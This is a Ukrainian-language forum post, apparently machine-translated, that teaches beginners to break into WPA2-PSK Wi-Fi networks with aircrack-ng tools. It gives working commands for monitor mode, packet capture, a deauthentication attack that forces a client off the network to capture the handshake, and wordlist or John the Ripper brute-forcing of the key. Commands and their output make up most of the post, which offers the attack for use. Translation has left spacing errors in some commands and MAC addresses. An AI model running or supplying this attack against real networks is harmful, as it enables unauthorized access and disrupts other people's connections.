Злом wi-fi для новачків

Злом wi-fi для новачків.

Злом wi-fi для новачків.

як обходити захист точок і як генерувати хеші для злому WPA за допомогою airolib-ng

Re: Злом wi-fi для новачків.

Додано через 23 години 41 хвилину
злом WPA.


Я буду використовувати Dlink DWL-G122 (USB), бездротової мережевий інтерфейс для цієї процедури. У backtrack4, цей пристрій визнано wlan0.

По-перше, поставити карту в режимі моніторингу:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]

# Airmon-ng start wlan0

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(Monitor mode enabled on mon0)
.

Добре, тепер ми можемо використовувати інтерфейс mon0

Давайте знайдемо бездротову мережу, яка використовує WPA2 / PSK

BSSID PWR Beacons #Data, # / s CH MB ENC CIPHER AUTH ESSID

00: 19: 5B: 52: AD: F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00: 19: 5B: 52: AD: F7 00: 1C: BF: 90: 5B: A3 -29 0- 1 12 4 TestNet

Зупинимо airodump-ng (ctrl + c) і запустимо його знову, що-б записати все пакети на диск

airodump-ng mon0 --channel 10 --bssid 00: 19: 5B: 52: AD: F7 -w / tmp / wpa2


На даний момент, у вас є 2 варіанти: або чекати, поки клієнт підключиться і 4-handshake буде повним, або deauthenticate існуючих клієнтів і таким чином змусити AP reassociate. Час-гроші, так що давайте змусимо силою deauthenticate. Ми повинні запустити aireplay-ng ввівши BSSID ЗС (-а) і МАС підключеного клієнта (-з)

# Aireplay-ng -0 1 -a 00: 19: 5B: 52: AD: F7 -c 00: 1C: BF: 90: 5B: A3 mon0

13:04:19 Waiting for beacon frame (BSSID: 00: 19: 5B: 52: AD: F7) on channel 10

13:04:20 Sending 64 directed DeAuth. STMAC: [00: 1C: BF: 90: 5B: A3] [67 | 66 ACKs]

Як результат, airodump-ng укажeт "WPA Handshake:" у верхньому правому куті

BSSID PWR RXQ Beacons #Data, # / s CH MB ENC CIPHER AUTH ESSID

00: 19: 5B: 52: AD: F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00: 19: 5B: 52: AD: F7 00: 1C: BF: 90: 5B: A3 -27 54-54 0 230


Остановітe airodump-ng і переконайтеся, що файли були створені правильно

root @ bt: / # ls / tmp / wpa2 * -al

Є 2 способи bruteforcing: один, який відносно швидкий, але не гарантує успіху і той, який йде дуже повільно, але гарантує, що ви знайдете ключ через певний момент часу.

Перший варіант є використанням робочого списку / dictionary file. Багато з цих файлів можна знайти в Інтернеті, або можуть бути отримані за допомогою таких інструментів, як John the Ripper. Як тільки список слів буде створений, все що вам потрібно зробити, це запустити Aircrack-ng підставивши файл з Handshake і словник word.txt

aircrack-ng -w /tmp/wordlists/word.lst -b 00: 19: 5B: 52: AD: F7 /tmp/wpa2*.cap

Другий метод (bruteforcing) буде успішним напевно, але це може зайняти багато часу. щоб закінчити. Майте на увазі, WPA2 ключ може бути до 64 символів, так що в теорії що-б побудувати всі поєднання паролів з усіма можливими наборами символів і згодувати їх в Aircrack займе багато часу. Якщо ви хочете використовувати John The Ripper для створення всіх можливих комбінацій паролів і згодувати їх в Aircrack-NG, це команда для використання:

# / Pentest / password / jtr / john --stdout --incremental: all | aircrack-ng -b 00: 19: 5B: 52: AD: F7 -w - /tmp/wpa2*.cap

Схожі статті